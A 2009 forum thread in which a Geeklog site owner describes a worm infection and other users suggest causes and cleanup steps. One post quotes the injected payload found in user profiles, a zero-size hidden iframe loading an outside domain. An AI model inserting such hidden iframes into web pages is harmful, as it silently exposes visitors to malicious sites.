Posted on: 04/03/09 03:15am
By: Anonymous (ismael)
Hi,
last night i sufered a worm infection. I use geeklok 1.4.1. All my stories and comments has an m.winxyz.com reference.
Thank you,
ismael
Re: worm infection
Posted on: 04/03/09 03:18am
By: Anonymous (ismael)
every new user has this web in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>
Re: worm infection
Posted on: 04/03/09 07:52am
By: Anonymous (ismael)
can it be due to fckeditor sql injection?
Re: worm infection
Posted on: 04/03/09 07:58am
By: Dirk
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.
Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.
Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.
bye, Dirk
Re: worm infection
Posted on: 04/03/09 11:16am
By: Anonymous (ismael)
more info about this.
i detected the problem become from a user that has stort admin privilegies. It seems that this user has a troyan that take access to my geeklog site and modifies his stories.
now this user is suspended, but i'm really worried about this situation if the security of my site depends on my users security.
This morning, all accounts on my site have his profile modified, also my profile as admin. I can't explain myself.
The geeklog files are not been modified.
Thank you,
ismael
Re: worm infection
Posted on: 04/03/09 01:52pm
By: guganbl
I had a similar problem some time ago. The reason was compromised ftp account.
Person that used that account had a virus and from that moment something started inserting linest that pointed to other infected sites in my gl. I downloaded complete gl, and scanned all files to fine code, and than replaced those files.
Faster way to deal with this is to replace all files , and use same old DB as Dirk told you.
And change password on your ftp account, just in case